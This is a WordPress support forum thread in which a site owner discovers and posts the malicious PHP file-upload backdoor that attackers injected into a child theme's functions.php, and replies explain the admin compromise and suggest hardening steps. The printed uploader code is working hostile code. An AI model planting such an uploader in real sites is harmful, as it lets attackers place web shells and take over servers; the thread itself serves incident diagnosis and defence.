Random upload form

  • Last week my website developed a problem and can anyone suggest how to fix it? The website is https://www.tamarackshackantiques.com and has a spot to upload a file for some reason at the top of the page. It randomly appeared and is on both the actual site and the admin part. I also can’t change or upload photos to the site or to the products. Any suggestions on how to fix this?

Viewing 5 replies - 1 through 5 (of 5 total)
  • Moderator Steven Stern (sterndata)

    (@sterndata)

    Volunteer Forum Moderator

    According to Sucur, your site is not serving malware. Before we fly the “hacked” flag, lets do a few checks:

    1. Install Wordfence and perform a scan of the site, including themes, plugins, and core files.

    2. If that shows up as clean, this may be a plugin or theme issue. Please attempt to disable all plugins, and use one of the default (Twenty*) themes. If the problem goes away, enable them one by one to identify the source of your troubles.

    Thread Starter tamarackshack

    (@tamarackshack)

    Thank you for your help. I do believe that the site was hacked and I figured out that they added this to my funtion.php on my child theme:

    <?php
    if(isset($_POST[‘Submit’])){
    $filedir = “”;
    $maxfile = ‘2000000’;

    $userfile_name = $_FILES[‘image’][‘name’];
    $userfile_tmp = $_FILES[‘image’][‘tmp_name’];
    if (isset($_FILES[‘image’][‘name’])) {
    $abod = $filedir.$userfile_name;
    @move_uploaded_file($userfile_tmp, $abod);

    echo”<center><b>Done ==> $userfile_name</b></center>”;
    }
    }
    else{
    echo’
    <form method=”POST” action=”” enctype=”multipart/form-data”><input type=”file” name=”image”><input type=”Submit” name=”Submit” value=”Submit”></form>’;
    }
    ?>

    That’s definitely the result of malicious action and there’s a very high chance that it was done through a WordPress admin compromise. Once they have your admin login, they want to upload files to increase their access privileges. This is done by uploading PHP shell files and can be done through the two most common methods AFTER they have the admin login:

    1) Utilize the built-in theme editor to modify the source coding of your theme (this is what was likely used in your case)

    2) Utilize the plugin uploader to upload a fake plugin that actually contains their PHP shells or other malware to increase access privileges for themselves

    It looks like your login was compromised, theme editor used to inject malicious coding to the functions.php theme file and to be more specific it was coding for a file uploader so they could use it to gain further access. It looks like an amateur job.

    If you don’t have a recent clean backup that you can restore from, then I would recommend contacting a specialist to handle this for you unless you are familiar with hosting environments. After cleaning, you will want to start by hardening your WP environment. By far the best two things would be the following:

    – Disable theme editor through wp-config.php

    – Implement two-factor authentication for wp-admin

    P.S. If you are hosting multiple domains under a single user then they are also probably infected, or will be soon, through cross site contamination.

    • This reply was modified 8 years, 4 months ago by g0tr00t. Reason: Forgot to mention cross-site contamination
    Moderator Steven Stern (sterndata)

    (@sterndata)

    Volunteer Forum Moderator

    Remain calm and carefully follow this guide. When you’re done, you may want to implement some (if not all) of the recommended security measures.

    Thank you very much, I encountered the exact same thing and you’ve saved me a crapload of time looking for solutions. Thank you.

Viewing 5 replies - 1 through 5 (of 5 total)
  • The topic ‘Random upload form’ is closed to new replies.